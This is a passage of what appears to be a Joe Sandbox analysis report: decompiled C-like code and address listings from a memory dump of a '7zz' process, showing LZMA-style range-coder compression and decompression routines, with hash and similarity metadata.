										_t993 = _t992 +  *((intOrPtr*)(_t1151 + 0x31950 + ( *(_t1153 + 0x28) + (_t874 << 6)) * 4)) +  *((intOrPtr*)(_t1151 + 0x32550 + (_t697 & 0x0000000f) * 4));
									} else {
										_t993 = _t992 +  *((intOrPtr*)(_t1151 + 0x31d50 + ((_t874 << 7) + _t697) * 4));
									}
									 *(_t1153 + 0x40) = _t993;
									if(_t993 <  *(_t793 - 0x1c)) {
										 *(_t793 - 0x1c) = _t993;
										 *(_t793 - 4) =  *(_t1153 + 0x14);
										 *_t793 = _t697 + 4;
										 *(_t793 - 0x14) = 0;
									}
									if(_t1080 - 1 !=  *((intOrPtr*)(_t1151 + 0x310a0 +  *(_t1153 + 0x80) * 4))) {
										goto L126;
									}
									L108:
									_t995 =  *(_t1153 + 0x34);
									_t699 =  *(_t1151 + 0x31934) + _t1080;
									_t882 =  *((intOrPtr*)(_t1153 + 0x20)) - _t697 - 1;
									_t1128 = _t1080;
									if(_t699 > _t995) {
										_t699 = _t995;
									}
									if(_t1080 >= _t699) {
										L116:
										_t1129 = _t1128 + (_t995 | 0xffffffff) - _t1080 - 1;
										 *((intOrPtr*)(_t1153 + 0x3c)) = _t1129;
										if(_t1129 < 2) {
											L123:
											_t702 =  *(_t1153 + 0x80) + 2;
											 *(_t1153 + 0x80) = _t702;
											if(_t702 ==  *((intOrPtr*)(_t1153 + 0x38))) {
												goto L127;
											}
											_t697 =  *(_t1151 + 0x310a4 + _t702 * 4);
											 *(_t1153 + 0x2c) = _t697;
											if(_t697 >= 0x80) {
												 *(_t1153 + 0x28) = ( *((_t697 >> ( ~(0x1ffff - _t697 >> 0x1f) & 0x0000000a) + 6) + _t1151 + 0x306a0) & 0x000000ff) + (( ~(0x1ffff - _t697 >> 0x1f) & 0x0000000a) + 6) * 2;
											}
											goto L126;
										}
										_t704 =  *(_t1153 + 0x84) + _t1080 - 1;
										 *(_t1153 + 0x54) = _t704;
										_t1131 =  *(_t1151 + 0x325a8) & _t704;
										_t706 = E0045FBE0( *(_t882 + _t1080 - 1) & 0x000000ff,  *(_t1080 +  *((intOrPtr*)(_t1153 + 0x20)) - 1) & 0x000000ff, _t1151 + 0x30ea0, ((( *( *((intOrPtr*)(_t1153 + 0x20)) + _t1080 - 2) & 0x000000ff) >> 8 -  *(_t1151 + 0x32598)) + (( *(_t1151 + 0x325a4) &  *(_t1153 + 0x54)) <<  *(_t1151 + 0x32598))) * 0x600 +  *((intOrPtr*)(_t1151 + 0x325ac)));
										_t896 =  *(0x47c60c +  *(_t1153 + 0x1c) * 4);
										_t795 =  *(0x47c5dc + _t896 * 4);
										_t1080 =  *(_t1153 + 0x44);
										_t898 = 0x00000001 + _t1131 &  *(_t1151 + 0x325a8);
										_t1012 = (_t795 << 4) + _t898;
										 *(_t1153 + 0x4c) = _t1012;
										_t1018 =  *((intOrPtr*)(_t1151 + 0x30ea0 + (( *(_t1151 + 0x325b0 + _t1012 * 2) & 0x0000ffff ^ 0x000007f0) >> 4) * 4)) +  *((intOrPtr*)(_t1151 + 0x30ea0 + (( *(_t1151 + 0x32730 + _t795 * 2) & 0x0000ffff ^ 0x000007f0) >> 4) * 4)) + _t706 +  *((intOrPtr*)(_t1151 + 0x30ea0 + (( *(_t1151 + 0x325b0 + ((_t896 << 4) + _t1131) * 2) & 0x0000ffff) >> 4) * 4)) +  *(_t1153 + 0x40);
										_t1136 =  *((intOrPtr*)(_t1153 + 0x3c)) + _t1080 - 1 + 1 +  *(_t1153 + 0x14);
										_t711 =  *(_t1153 + 0x18);
										 *(_t1153 + 0x50) = _t1136;
										if(_t711 >= _t1136) {
											L121:
											_t793 =  *(_t1153 + 0x24);
											_t902 = _t1136 + _t1136 * 2 + _t1136 + _t1136 * 2;
											_t719 =  *((intOrPtr*)(_t1151 + 0x30ea0 + (( *(_t1151 + 0x32790 +  *(_t1153 + 0x4c) * 2) & 0x0000ffff ^ 0x000007f0) >> 4) * 4)) +  *((intOrPtr*)(_t1151 + 0x30ea0 + (( *(_t1151 + 0x32748 + _t795 * 2) & 0x0000ffff) >> 4) * 4)) +  *((intOrPtr*)(_t1151 + 0x37858 + (_t898 * 0x110 +  *((intOrPtr*)(_t1153 + 0x3c))) * 4)) + _t1018;
											_t903 = _t1151 + 0x6a0 + _t902 * 8;
											if(_t719 <  *((intOrPtr*)(_t1151 + 0x6a0 + _t902 * 8))) {
												_t1019 =  *(_t1153 + 0x14);
												 *_t903 = _t719;
												 *(_t903 + 0x10) = _t1019;
												 *((intOrPtr*)(_t903 + 0x18)) = _t1080 + _t1019;
												 *(_t903 + 0x1c) = 0;
												 *(_t903 + 8) = 1;
												 *(_t903 + 0xc) = 1;
												 *((intOrPtr*)(_t903 + 0x14)) =  *(_t1153 + 0x2c) + 4;
											}
											goto L123;
										}
										 *(_t1153 + 0x54) = _t1151 + 0x6a0 + (_t711 + _t711 * 2 + _t711 + _t711 * 2) * 8;
										_t725 =  *(_t1153 + 0x18);
										_t1137 = _t1136 - _t725;
										 *(_t1153 + 0x18) = _t725 + _t1137;
										_t727 =  *(_t1153 + 0x54);
										do {
											_t727 = _t727 + 0x30;
											_t1137 = _t1137 - 1;
											 *_t727 = 0x40000000;
										} while (_t1137 != 0);
										_t1136 =  *(_t1153 + 0x50);
										goto L121;
									} else {
										_t799 =  *((intOrPtr*)(_t1153 + 0x20)) - _t882;
										_t995 = _t882 + _t1080;
										 *(_t1153 + 0x54) = _t799;
										while( *((intOrPtr*)(_t799 + _t995)) ==  *_t995) {
											_t1128 = 1 + _t1128;
											_t995 = 1 + _t995;
											if(_t1128 < _t699) {
												_t799 =  *(_t1153 + 0x54);
												continue;
											}
											break;
										}
										_t793 =  *(_t1153 + 0x24);
										goto L116;
									}
									L126:
									 *(_t1153 + 0x30) =  *(_t1153 + 0x30) + 4;
									_t793 = _t793 + 0x30;
									_t1080 = 1 + _t1080;
									_t992 =  *( *(_t1153 + 0x30)) +  *((intOrPtr*)(_t1153 + 0x58));
									 *(_t1153 + 0x24) = _t793;
									 *(_t1153 + 0x44) = _t1080;
									_t874 = _t1080 - 3;
									if(_t1080 - 1 >= 5) {
										_t874 = 3;
									}
									if(_t697 >= 0x80) {
										_t993 = _t992 +  *((intOrPtr*)(_t1151 + 0x31950 + ( *(_t1153 + 0x28) + (_t874 << 6)) * 4)) +  *((intOrPtr*)(_t1151 + 0x32550 + (_t697 & 0x0000000f) * 4));
									} else {
										_t993 = _t992 +  *((intOrPtr*)(_t1151 + 0x31d50 + ((_t874 << 7) + _t697) * 4));
									}
									 *(_t1153 + 0x40) = _t993;
									if(_t993 <  *(_t793 - 0x1c)) {
										 *(_t793 - 0x1c) = _t993;
										 *(_t793 - 4) =  *(_t1153 + 0x14);
										 *_t793 = _t697 + 4;
										 *(_t793 - 0x14) = 0;
									}
									if(_t1080 - 1 !=  *((intOrPtr*)(_t1151 + 0x310a0 +  *(_t1153 + 0x80) * 4))) {
										goto L126;
									}
								}
							}
							do {
								_t695 = _t695 + 2;
							} while (_t988 >  *((intOrPtr*)(_t1151 + 0x310a0 + _t695 * 4)));
							 *(_t1153 + 0x80) = _t695;
							goto L99;
						}
						_t728 = _t694 - _t858;
						_t1140 = _t1151 + 0x6a0 + (_t858 + _t858 * 2 + _t858 + _t858 * 2) * 8;
						 *(_t1153 + 0x18) = _t858 + _t728;
						do {
							_t1140 = _t1140 + 0x30;
							_t728 = _t728 - 1;
							 *_t1140 = 0x40000000;
						} while (_t728 != 0);
						goto L95;
					}
					_t908 = 0;
					_t1122 = _t689;
					if(_t689 <=  *((intOrPtr*)(_t1151 + 0x310a0))) {
						L90:
						 *(_t1151 + 0x310a0 + _t908 * 4) = _t689;
						 *((intOrPtr*)(_t1153 + 0x38)) = _t908 + 2;
						goto L91;
					} else {
						goto L89;
					}
					do {
						L89:
						_t908 = _t908 + 2;
					} while (_t689 >  *(_t1151 + 0x310a0 + _t908 * 4));
					goto L90;
				}
			}

0x00460e00
0x00460e00
0x00460e00
0x00460e13
0x00460e14
0x00460e1a
0x00000000
0x00000000
0x00460e20
0x00460e20
0x00460e27
0x00460e2e
0x00000000
0x00000000
0x00460e34
0x00460e38
0x00460e3f
0x00460e53
0x00460e57
0x00460e5b
0x00460e60
0x00460e8c
0x00460e9e
0x00460ea9
0x00460ead
0x00460eb3
0x00460eb9
0x00460ec5
0x00460ec9
0x00460ecd
0x00460ed4
0x00460ed6
0x00460ed8
0x00460edd
0x00460edf
0x00460ee6
0x00460ef0
0x00460ef2
0x00460ef2
0x00460ef9
0x00460efa
0x00460efd
0x00460f00
0x00460f0d
0x00460f0f
0x00460f12
0x00460f12
0x00460f1c
0x00460f20
0x00460f20
0x00460f23
0x00460f25
0x00460f2b
0x00460f2d
0x00460f2f
0x00460f2f
0x00460f35
0x00460f39
0x00460f53
0x00460f58
0x00460f5a
0x00460f61
0x00000000
0x00000000
0x00460f7d
0x00460f88
0x00460f9c
0x00460fbf
0x00460fc8
0x00460fcf
0x00460fea
0x0046100f
0x00461017
0x00461026
0x00461028
0x00461046
0x00461060
0x00461068
0x0046106c
0x00461070
0x00461076
0x004610b0
0x004610f1
0x004610f3
0x004610fc
0x00461103
0x00461105
0x0046110b
0x0046110f
0x00461117
0x00461121
0x00461128
0x0046112b
0x0046112e
0x0046112e
0x00000000
0x00461103
0x00461084
0x00461088
0x0046108c
0x00461090
0x00461094
0x004610a0
0x004610a0
0x004610a3
0x004610a4
0x004610a4
0x004610ac
0x00000000
0x00460f3b
0x00460f3f
0x00460f42
0x00460f44
0x00460f4b
0x00460f4c
0x00460f51
0x00000000
0x00000000
0x00000000
0x00460f51
0x00000000
0x00460f44
0x00460f39
0x00460e69
0x00460e6d
0x00460e74
0x00460e80
0x00460e80
0x00460e83
0x00460e84
0x00460e84
0x00000000
0x00460e80
0x00460e41
0x00460e44
0x00460e46
0x00460e4d
0x00460e4e
0x00460e51
0x00000000
0x00000000
0x00000000
0x00460e51
0x00000000
0x00461131
0x00461138
0x00461139
0x00461143
0x00460e00
0x00460e00
0x00460e00
0x00460e13
0x00460e14
0x00460e1a
0x00000000
0x00000000
0x00000000
0x00460e1a
0x00460e00
0x00461149
0x0046114d
0x00461153
0x0046117b
0x0046117b
0x00461181
0x00461560
0x00461560
0x00461564
0x00461565
0x0046156d
0x00000000
0x00000000
0x00460877
0x0046087c
0x00460886
0x00461579
0x0046157f
0x00461585
0x0046159f
0x0046088c
0x0046088c
0x00460890
0x0046089a
0x0046089d
0x004608a4
0x004608ab
0x004608af
0x00460910
0x004608b1
0x004608b1
0x004608b9
0x00460902
0x004608bb
0x004608cd
0x004608d4
0x004608ed
0x004608d6
0x004608dd
0x004608dd
0x004608d4
0x004608b9
0x0046091a
0x00460947
0x0046096e
0x00460974
0x0046097e
0x00460994
0x0046099b
0x00000000
0x0046099b
0x00460987
0x0046098b
0x00000000
0x00460952
0x00460952
0x00460958
0x0046095e
0x00460965
0x004609a2
0x004609a2
0x004609a6
0x004609ab
0x004609b5
0x004609f7
0x004609fe
0x00460a05
0x00460a09
0x00000000
0x00460a09
0x004609bb
0x004609bf
0x004609c6
0x004609de
0x004609ed
0x004609ed
0x00000000
0x004609ed
0x004609d7
0x004609d7
0x004609dc
0x00000000
0x00000000
0x00000000
0x004609dc
0x0046091c
0x00460923
0x0046093c
0x00460925
0x0046092c
0x0046092c
0x00460a0d
0x00460a19
0x00460a1d
0x00460a27
0x00460a33
0x00460a39
0x00460a3f
0x00460a4b
0x00460a4f
0x00460a59
0x00460a59
0x00460a5e
0x00460a67
0x00460a6f
0x00460a73
0x00460a77
0x00460a80
0x00460a88
0x00460a8f
0x00460a91
0x00460aab
0x00460ab3
0x00460ace
0x00460ae2
0x00460aeb
0x00460b10
0x00460b18
0x00460b20
0x00460b42
0x00460b49
0x00460b4b
0x00460b4f
0x00460b56
0x00460b58
0x00460b5c
0x00460b5e
0x00460b68
0x00460b6a
0x00460b74
0x00460b7a
0x00460b84
0x00460b8e
0x00460b8e
0x00460b96
0x00460bb9
0x00460bcd
0x00460bd1
0x00460bd3
0x00460bde
0x00460be6
0x00460c1d
0x00460c25
0x00460c27
0x00460c2f
0x00460c35
0x00460c3b
0x00460c41
0x00460c41
0x00460c25
0x00460c49
0x00460c54
0x00460c56
0x00460c5c
0x00460c5e
0x00460c60
0x00460c60
0x00460c67
0x00000000
0x00460c6d
0x00460c6d
0x00460c73
0x00460c79
0x00460c7b
0x00460c7b
0x00460c84
0x00460de3
0x00460de3
0x00460deb
0x00000000
0x00460c9b
0x00460c9b
0x00460c9e
0x00460ca0
0x00460ca0
0x00460ca2
0x00460ca9
0x00460cc5
0x00460cc5
0x00460cc5
0x00460cc8
0x00460cd2
0x00000000
0x00000000
0x00460cdc
0x00460cf7
0x00460d02
0x00460d33
0x00460d37
0x00460d3b
0x00460d3f
0x00460d45
0x00460d75
0x00460db6
0x00460db8
0x00460dc1
0x00460dc8
0x00460dcf
0x00460dd3
0x00460dd6
0x00460dd9
0x00460de0
0x00460de0
0x00000000
0x00460dc8
0x00460d53
0x00460d59
0x00460d5d
0x00460d61
0x00460d65
0x00460d65
0x00460d68
0x00460d69
0x00460d69
0x00460d71
0x00000000
0x00460cab
0x00460cab
0x00460cb3
0x00460cb6
0x00460cb8
0x00460cbf
0x00460cc0
0x00460cc3
0x00000000
0x00000000
0x00000000
0x00460cc3
0x00000000
0x00460cb8
0x00460ca9
0x00460c84
0x00460c67
0x00460b01
0x00000000
0x00460b01
0x0046091a
0x00460886
0x00000000
0x00461573
0x004611a5
0x004611a9
0x004611ac
0x004611b2
0x004611dc
0x004611dc
0x004611de
0x004611eb
0x00461203
0x0046120a
0x00461227
0x0046122a
0x00461239
0x00461250
0x0046125f
0x00461266
0x0046126c
0x00461276
0x0046127a
0x0046127e
0x00461281
0x00461283
0x00461283
0x0046128d
0x004612b7
0x0046128f
0x00461294
0x00461294
0x004612b9
0x004612c0
0x004612c2
0x004612cc
0x004612cf
0x004612d1
0x004612d1
0x004612e9
0x00000000
0x00000000
0x004612ef
0x004612f3
0x004612ff
0x00461301
0x00461302
0x00461306
0x00461308
0x00461308
0x0046130c
0x00461335
0x0046133d
0x0046133f
0x00461346
0x00461504
0x0046150b
0x0046150e
0x00461519
0x00000000
0x00000000
0x0046151b
0x00461522
0x0046152b
0x0046154e
0x0046154e
0x00000000
0x0046152b
0x0046135f
0x00461363
0x00461367
0x004613ae
0x004613b7
0x004613be
0x004613de
0x004613e9
0x004613fc
0x004613fe
0x0046142e
0x00461438
0x0046143c
0x00461440
0x00461446
0x00461480
0x004614b7
0x004614c5
0x004614c7
0x004614d0
0x004614d7
0x004614d9
0x004614dd
0x004614e2
0x004614e9
0x004614f4
0x004614fb
0x004614fe
0x00461501
0x00461501
0x00000000
0x004614d7
0x00461454
0x00461458
0x0046145c
0x00461460
0x00461464
0x00461470
0x00461470
0x00461473
0x00461474
0x00461474
0x0046147c
0x00000000
0x0046130e
0x00461312
0x00461314
0x00461317
0x00461324
0x0046132b
0x0046132c
0x0046132f
0x00461320
0x00000000
0x00461320
0x00000000
0x0046132f
0x00461331
0x00000000
0x00461331
0x00461552
0x00461552
0x00461557
0x0046155a
0x0046126c
0x00461276
0x0046127a
0x0046127e
0x00461281
0x00461283
0x00461283
0x0046128d
0x004612b7
0x0046128f
0x00461294
0x00461294
0x004612b9
0x004612c0
0x004612c2
0x004612cc
0x004612cf
0x004612d1
0x004612d1
0x004612e9
0x00000000
0x00000000
0x004612e9
0x00461266
0x004611f0
0x004611f0
0x004611f3
0x004611fc
0x00000000
0x004611fc
0x004611b9
0x004611bd
0x004611c4
0x004611d0
0x004611d0
0x004611d3
0x004611d4
0x004611d4
0x00000000
0x004611d0
0x00461155
0x00461157
0x0046115f
0x0046116d
0x0046116d
0x00461177
0x00000000
0x00000000
0x00000000
0x00000000
0x00461161
0x00461161
0x00461161
0x00461164
0x00000000
0x00461161

Memory Dump Source

Source File: 0000000F.00000002.573016723.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.572995163.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573100593.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573121873.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573130795.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573138835.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573146694.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573156522.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573171372.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_7zz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1f8fa4cdc9228aaa3a07012a4c32e0885d6804b09010c7afb976018d4f09c0f3
Instruction ID: 7147a41103b82fee1bf31e8f6f8380e5711e53636797ff3198694e8fe18354a8
Opcode Fuzzy Hash: 1f8fa4cdc9228aaa3a07012a4c32e0885d6804b09010c7afb976018d4f09c0f3
Instruction Fuzzy Hash: D332C1716082458FCB19CF18D4906AEB7E2FFD9308F148A2DE88A97310E739E955CF42

Uniqueness

Uniqueness Score: -1.00%

Function 0045E0C0 Relevance: .5, Instructions: 481
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E0045E0C0(void* __eax, signed int* __ecx) {
				intOrPtr _t149;
				unsigned int _t153;
				signed int _t157;
				signed int _t158;
				intOrPtr _t159;
				signed int _t160;
				signed int _t161;
				signed char* _t162;
				signed int _t164;
				intOrPtr _t167;
				signed int _t168;
				signed char* _t169;
				signed int _t171;
				signed char* _t179;
				signed int _t190;
				signed int _t192;
				signed int _t196;
				signed char* _t197;
				signed char* _t199;
				signed int _t204;
				signed short* _t205;
				void* _t206;
				signed int _t207;
				signed int _t215;
				signed int _t216;
				signed char* _t225;
				signed int _t228;
				signed int _t232;
				signed int _t235;
				signed int _t238;
				signed int _t241;
				signed int _t244;
				signed int _t247;
				signed char _t251;
				void* _t252;
				signed int _t265;
				signed int _t270;
				signed int _t271;
				signed int _t272;
				signed int _t278;
				signed char* _t279;
				signed int _t281;
				signed int _t283;
				signed int _t284;
				signed int _t285;
				signed int _t286;
				signed int _t287;
				signed int _t288;
				signed int _t289;
				signed int _t290;
				unsigned int _t291;
				signed int* _t292;
				intOrPtr _t293;
				signed char* _t294;
				signed short* _t296;
				signed int _t297;
				signed int _t298;
				signed int _t300;
				signed int _t301;
				signed int _t310;
				signed int _t314;
				signed int _t319;
				signed int _t320;
				signed int _t321;
				signed int _t322;
				signed int _t323;
				signed int _t324;
				signed int _t325;
				signed int _t340;
				signed int _t341;
				signed int _t342;
				signed char* _t344;
				void* _t351;

				_t292 = __ecx;
				_t340 =  *(__ecx + 0x34);
				_t283 =  *(__ecx + 0x1c);
				_t321 =  *(__ecx + 0x20);
				_t149 =  *((intOrPtr*)(__ecx + 0x10));
				 *(_t351 + 0x10) =  &(( *(_t351 + 0x28))[__eax]);
				 *((intOrPtr*)(_t351 + 0x14)) = _t149;
				_t204 = (0x00000001 <<  *(__ecx + 8)) - 0x00000001 &  *(__ecx + 0x2c);
				 *(_t351 + 0x18) =  *(_t149 + ((_t340 << 4) + 1) * 2) & 0x0000ffff;
				if(_t283 >= 0x1000000) {
					L4:
					_t153 = (_t283 >> 0xb) *  *(_t351 + 0x18);
					if(_t321 >= _t153) {
						_t293 =  *((intOrPtr*)(_t351 + 0x14));
						_t225 =  *(_t351 + 0x28);
						_t284 = _t283 - _t153;
						_t322 = _t321 - _t153;
						 *(_t351 + 0x18) =  *(_t293 + 0x180 + _t340 * 2) & 0x0000ffff;
						if(_t284 >= 0x1000000) {
							L39:
							_t157 = (_t284 >> 0xb) *  *(_t351 + 0x18);
							if(_t322 >= _t157) {
								_t285 = _t284 - _t157;
								_t323 = _t322 - _t157;
								_t158 =  *(_t293 + 0x198 + _t340 * 2) & 0x0000ffff;
								 *(_t351 + 0x1c) = 3;
								if(_t285 >= 0x1000000) {
									L44:
									_t228 = (_t285 >> 0xb) * _t158;
									_t159 =  *((intOrPtr*)(_t351 + 0x14));
									if(_t323 >= _t228) {
										_t294 =  *(_t351 + 0x28);
										_t286 = _t285 - _t228;
										_t324 = _t323 - _t228;
										 *(_t351 + 0x18) =  *(_t159 + 0x1b0 + _t340 * 2) & 0x0000ffff;
										if(_t286 >= 0x1000000) {
											L55:
											_t232 = (_t286 >> 0xb) *  *(_t351 + 0x18);
											if(_t324 >= _t232) {
												_t160 =  *(_t159 + 0x1c8 + _t340 * 2) & 0x0000ffff;
												_t287 = _t286 - _t232;
												_t323 = _t324 - _t232;
												if(_t287 >= 0x1000000) {
													L60:
													_t235 = (_t287 >> 0xb) * _t160;
													if(_t323 >= _t235) {
														goto L62;
													} else {
														_t288 = _t235;
													}
													goto L63;
												} else {
													if(_t294 >=  *(_t351 + 0x10)) {
														goto L2;
													} else {
														_t287 = _t287 << 8;
														_t323 = _t323 << 0x00000008 |  *_t294 & 0x000000ff;
														 *(_t351 + 0x28) =  &(_t294[1]);
														goto L60;
													}
												}
											} else {
												_t288 = _t232;
												goto L63;
											}
										} else {
											if(_t294 >=  *(_t351 + 0x10)) {
												goto L2;
											} else {
												_t286 = _t286 << 8;
												_t324 = _t324 << 0x00000008 |  *_t294 & 0x000000ff;
												_t294 =  &(_t294[1]);
												 *(_t351 + 0x28) = _t294;
												goto L55;
											}
										}
									} else {
										_t314 =  *(_t159 + ((_t340 + 0xf << 4) + _t204) * 2) & 0x0000ffff;
										_t179 =  *(_t351 + 0x28);
										_t287 = _t228;
										if(_t228 >= 0x1000000) {
											L48:
											_t235 = (_t287 >> 0xb) * _t314;
											if(_t323 >= _t235) {
												L62:
												_t288 = _t287 - _t235;
												_t323 = _t323 - _t235;
												L63:
												_t225 =  *(_t351 + 0x28);
												 *(_t351 + 0x20) = 0xc;
												_t296 =  *((intOrPtr*)(_t351 + 0x14)) + 0xa68;
												goto L64;
											} else {
												if(_t235 >= 0x1000000 || _t179 <  *(_t351 + 0x10)) {
													return 3;
												} else {
													goto L2;
												}
											}
										} else {
											if(_t179 >=  *(_t351 + 0x10)) {
												goto L2;
											} else {
												_t287 = _t228 << 8;
												_t323 = _t323 << 0x00000008 |  *_t179 & 0x000000ff;
												_t179 =  &(_t179[1]);
												 *(_t351 + 0x28) = _t179;
												goto L48;
											}
										}
									}
								} else {
									if(_t225 >=  *(_t351 + 0x10)) {
										goto L2;
									} else {
										_t285 = _t285 << 8;
										_t323 = _t323 << 0x00000008 |  *_t225 & 0x000000ff;
										 *(_t351 + 0x28) =  &(_t225[1]);
										goto L44;
									}
								}
							} else {
								_t288 = _t157;
								 *(_t351 + 0x20) = 0;
								_t296 = _t293 + 0x664;
								 *(_t351 + 0x1c) = 2;
								L64:
								_t161 =  *_t296 & 0x0000ffff;
								if(_t288 >= 0x1000000) {
									L67:
									_t238 = (_t288 >> 0xb) * _t161;
									_t162 =  *(_t351 + 0x28);
									if(_t323 >= _t238) {
										_t341 = _t296[1] & 0x0000ffff;
										_t289 = _t288 - _t238;
										_t325 = _t323 - _t238;
										if(_t289 >= 0x1000000) {
											L72:
											_t241 = (_t289 >> 0xb) * _t341;
											if(_t325 >= _t241) {
												_t290 = _t289 - _t241;
												_t325 = _t325 - _t241;
												_t205 =  &(_t296[0x102]);
												_t342 = 0x10;
												 *(_t351 + 0x18) = 0x100;
											} else {
												_t342 = 8;
												_t290 = _t241;
												_t205 = _t296 + 0x104 + (_t204 + _t204) * 8;
												 *(_t351 + 0x18) = 8;
											}
											goto L75;
										} else {
											if(_t162 >=  *(_t351 + 0x10)) {
												goto L2;
											} else {
												_t289 = _t289 << 8;
												_t325 = _t325 << 0x00000008 |  *_t162 & 0x000000ff;
												_t162 =  &(_t162[1]);
												 *(_t351 + 0x28) = _t162;
												goto L72;
											}
										}
									} else {
										_t290 = _t238;
										_t205 = _t296 + 4 + (_t204 + _t204) * 8;
										_t342 = 0;
										 *(_t351 + 0x18) = 8;
										L75:
										_t297 = 1;
										L76:
										while(1) {
											if(_t290 >= 0x1000000) {
												L79:
												_t244 = (_t290 >> 0xb) * (_t205[_t297] & 0x0000ffff);
												if(_t325 >= _t244) {
													_t290 = _t290 - _t244;
													_t325 = _t325 - _t244;
													_t297 = _t297 + _t297 + 1;
												} else {
													_t290 = _t244;
													_t297 = _t297 + _t297;
												}
												_t164 =  *(_t351 + 0x18);
												if(_t297 >= _t164) {
													_t298 = _t297 + _t342 - _t164;
													if( *(_t351 + 0x20) >= 4) {
														goto L20;
													} else {
														if(_t298 >= 4) {
															_t298 = 3;
														}
														_t167 =  *((intOrPtr*)(_t351 + 0x14));
														_t344 =  *(_t351 + 0x28);
														_t128 = _t167 + 0x360; // 0x363
														_t206 = (_t298 << 7) + _t128;
														_t300 = 1;
														do {
															_t168 =  *(_t206 + _t300 * 2) & 0x0000ffff;
															if(_t290 >= 0x1000000) {
																goto L91;
															} else {
																if(_t344 >=  *(_t351 + 0x10)) {
																	goto L2;
																} else {
																	_t290 = _t290 << 8;
																	_t325 = _t325 << 0x00000008 |  *_t344 & 0x000000ff;
																	_t344 =  &(_t344[1]);
																	goto L91;
																}
															}
															goto L113;
															L91:
															_t247 = (_t290 >> 0xb) * _t168;
															if(_t325 >= _t247) {
																_t290 = _t290 - _t247;
																_t325 = _t325 - _t247;
																_t300 = _t300 + _t300 + 1;
															} else {
																_t290 = _t247;
																_t300 = _t300 + _t300;
															}
														} while (_t300 < 0x40);
														_t301 = _t300 - 0x40;
														if(_t301 < 4) {
															goto L21;
														} else {
															_t251 = (_t301 >> 1) - 1;
															if(_t301 >= 0xe) {
																_t169 =  *(_t351 + 0x10);
																_t252 = _t251 - 4;
																do {
																	if(_t290 >= 0x1000000) {
																		goto L102;
																	} else {
																		if(_t344 >= _t169) {
																			goto L2;
																		} else {
																			_t290 = _t290 << 8;
																			_t325 = _t325 << 0x00000008 |  *_t344 & 0x000000ff;
																			_t344 =  &(_t344[1]);
																			goto L102;
																		}
																	}
																	goto L113;
																	L102:
																	_t290 = _t290 >> 1;
																	_t325 = _t325 - ((_t325 - _t290 >> 0x0000001f) - 0x00000001 & _t290);
																	_t252 = _t252 - 1;
																} while (_t252 != 0);
																 *((intOrPtr*)(_t351 + 0x14)) =  *((intOrPtr*)(_t351 + 0x14)) + 0x644;
																_t251 = 4;
																goto L104;
															} else {
																 *((intOrPtr*)(_t351 + 0x14)) =  *((intOrPtr*)(_t351 + 0x14)) + 0x55e + (((_t301 & 0x00000001 | 0x00000002) << _t251) - _t301) * 2;
																L104:
																_t207 = 1;
																do {
																	_t171 =  *( *((intOrPtr*)(_t351 + 0x14)) + _t207 * 2) & 0x0000ffff;
																	if(_t290 >= 0x1000000) {
																		goto L108;
																	} else {
																		if(_t344 >=  *(_t351 + 0x10)) {
																			goto L2;
																		} else {
																			_t290 = _t290 << 8;
																			_t325 = _t325 << 0x00000008 |  *_t344 & 0x000000ff;
																			_t344 =  &(_t344[1]);
																			goto L108;
																		}
																	}
																	goto L113;
																	L108:
																	_t310 = (_t290 >> 0xb) * _t171;
																	if(_t325 >= _t310) {
																		_t290 = _t290 - _t310;
																		_t325 = _t325 - _t310;
																		_t207 = _t207 + _t207 + 1;
																	} else {
																		_t290 = _t310;
																		_t207 = _t207 + _t207;
																	}
																	_t251 = _t251 - 1;
																} while (_t251 != 0);
																goto L21;
															}
														}
													}
												} else {
													_t162 =  *(_t351 + 0x28);
													continue;
												}
											} else {
												if(_t162 >=  *(_t351 + 0x10)) {
													goto L2;
												} else {
													_t290 = _t290 << 8;
													_t325 = _t325 << 0x00000008 |  *_t162 & 0x000000ff;
													 *(_t351 + 0x28) =  &(_t162[1]);
													goto L79;
												}
											}
											goto L113;
										}
									}
								} else {
									if(_t225 >=  *(_t351 + 0x10)) {
										goto L2;
									} else {
										_t288 = _t288 << 8;
										_t323 = _t323 << 0x00000008 |  *_t225 & 0x000000ff;
										 *(_t351 + 0x28) =  &(_t225[1]);
										goto L67;
									}
								}
							}
						} else {
							if(_t225 >=  *(_t351 + 0x10)) {
								goto L2;
							} else {
								_t284 = _t284 << 8;
								_t322 = _t322 << 0x00000008 |  *_t225 & 0x000000ff;
								_t225 =  &(_t225[1]);
								 *(_t351 + 0x28) = _t225;
								goto L39;
							}
						}
					} else {
						_t291 = _t153;
						 *((intOrPtr*)(_t351 + 0x14)) =  *((intOrPtr*)(_t351 + 0x14)) + 0xe6c;
						if(_t292[0xc] != 0 || _t292[0xb] != 0) {
							_t265 = _t292[9];
							if(_t265 == 0) {
								_t265 = _t292[0xa];
							}
							 *((intOrPtr*)(_t351 + 0x14)) =  *((intOrPtr*)(_t351 + 0x14)) + ((( *(_t292[5] + _t265 - 1) & 0x000000ff) >> 8 -  *_t292) + (((0x00000001 << _t292[1]) - 0x00000001 & _t292[0xb]) <<  *_t292)) * 0x600;
						}
						if(_t340 >= 7) {
							_t270 = _t292[9];
							_t215 = _t292[0xe];
							if(_t270 >= _t215) {
								_t190 = 0;
							} else {
								_t190 = _t292[0xa];
							}
							_t271 =  *(_t292[5] - _t215 + _t270 + _t190) & 0x000000ff;
							_t216 = 0x100;
							_t319 = 1;
							while(1) {
								_t272 = _t271 + _t271;
								_t192 = _t216 & _t272;
								 *(_t351 + 0x20) = _t272;
								 *(_t351 + 0x18) =  *( *((intOrPtr*)(_t351 + 0x14)) + (_t192 + _t319 + _t216) * 2) & 0x0000ffff;
